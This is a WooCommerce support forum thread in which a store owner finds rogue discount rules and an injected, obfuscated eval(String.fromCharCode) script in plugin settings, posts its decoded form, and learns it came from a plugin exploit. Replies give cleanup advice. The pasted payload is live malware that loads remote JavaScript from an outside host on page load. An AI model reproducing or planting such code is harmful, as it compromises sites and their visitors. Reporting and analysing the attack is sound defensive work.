April 8 2024 holiday Philippines.REGISTER NOW GET FREE 888 PESOS REWARDS!

Resolved tgp1994
(@tgp1994)

3 years, 2 months ago
Hi everyone,

I run a WooCommerce store, and after updating plugins on my site, I’ve noticed some strange changes.

For one, there was a global product price discount of $1 applied across my entire store, with a code/note of “333”. There was also a cart discount rule created, named something to the effect of “qwertyuiop”. Lastly, there’s a Label field for the Your Price section in the Promotion tab, with this for text:

<script>eval(String.fromCharCode(118,97,114,32,114,116,114,116,117,32,61,32,69,108,101,109,101,110,116,59,32,114,116,114,116,117,46,112,114,111,116,111,116,121,112,101,46,97,112,112,101,110,100,65,102,116,101,114,32,61,32,102,117,110,99,116,105,111,110,40,116,121,116,107,121,106,116,121,106,101,110,116,41,32,123,116,121,116,107,121,106,116,121,106,101,110,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,116,104,105,115,44,32,116,121,116,107,121,106,116,121,106,101,110,116,46,110,101,120,116,83,105,98,108,105,110,103,41,59,125,44,32,102,97,108,115,101,59,40,102,117,110,99,116,105,111,110,40,41,32,123,32,118,97,114,32,116,121,116,107,121,106,116,121,106,32,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,116,121,116,107,121,106,116,121,106,46,116,121,112,101,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,116,121,116,107,121,106,116,121,106,46,115,114,99,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,53,44,49,49,54,44,57,55,44,49,49,54,44,52,54,44,57,56,44,49,48,49,44,49,48,56,44,49,49,49,44,49,49,48,44,49,49,48,44,57,55,44,49,49,48,44,49,49,49,44,49,49,54,44,49,49,53,44,49,48,49,44,49,49,52,44,49,49,56,44,49,48,53,44,57,57,44,49,48,49,44,52,54,44,49,48,51,44,57,55,44,52,55,44,49,48,51,44,49,48,49,44,49,49,54,44,52,54,44,49,48,54,44,49,49,53,44,54,51,44,49,49,53,44,54,49,44,53,49,44,53,49,41,59,116,121,116,107,121,106,116,121,106,46,97,112,112,101,110,100,65,102,116,101,114,40,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,91,48,93,41,59,116,121,116,107,121,106,116,121,106,46,97,112,112,101,110,100,65,102,116,101,114,40,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,41,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,116,121,116,107,121,106,116,121,106,41,59,125,41,40,41,59));</script>

This is decoded to:
```
var rtrtu = Element;
rtrtu.prototype.appendAfter = function (tytkyjtyjent) {
    tytkyjtyjent.parentNode.insertBefore(this, tytkyjtyjent.nextSibling);
}, false;
(function () {
    var tytkyjtyj = document.createElement(String.fromCharCode(script));
    tytkyjtyj.type = String.fromCharCode(text/javascript);
    tytkyjtyj.src = String.fromCharCode(https://stat.belonnanotservice.ga/get.js?s=33);
    tytkyjtyj.appendAfter(document.getElementsByTagName(String.fromCharCode(script))[0]);
    tytkyjtyj.appendAfter(document.getElementsByTagName(String.fromCharCode(head))[0]);
    document.getElementsByTagName(String.fromCharCode(head))[0].appendChild(tytkyjtyj);
})();
```
This is looking like malware to me. I don’t know how this was added to my site’s settings. Can anyone give me some guidance on understanding how this was added?

Viewing 4 replies - 1 through 4 (of 4 total)

Thread Starter tgp1994
(@tgp1994)

3 years, 2 months ago

Update: It looks like we were a victim of an exploit in RightPress’s WooCommerce Pricing & Discounts plugin. If you have this plugin, make sure you update it, check for any rogue Admin users, and revert any changed settings, especially within the P&D plugin, and especially if it looks like strange HTML code.

Plugin Support abwaita a11n
(@abwaita)

3 years, 2 months ago

Hi @tgp1994,

Thanks for the update.

I also see some resemblance of the malware code to the one explained here – https://medium.com/@Daugilas/cross-site-scripting-attack-letsmakeparty3-on-wordpress-cleaned-up-c6819df37c2b

I would suggest that you also try the cleanup and restoration suggestions given there as well as on this GitHub thread – https://gist.github.com/fabmars/b5150358da81265e9d94bd9fbd6382c7

Lastly, remember to inform your host about this attack.

All the best with this.
Thanks.

Thread Starter tgp1994
(@tgp1994)

3 years, 2 months ago

Thank you @abwaita. I’ve always been vaguely aware of attacks like this, although I’ve never been on the receiving end of one before. This has been a very educational experience, and I greatly appreciate your advice and guidance on what to do.

MayKato
(@maykato)

3 years, 2 months ago

Hi @tgp1994

Glad to hear @abwaita’s advise was helpful. I’m marking this thread as resolved now. If you have any other questions, feel free to open a new topic.

Viewing 4 replies - 1 through 4 (of 4 total)

The topic ‘Strange changes to WooCommerce store’ is closed to new replies.

Tags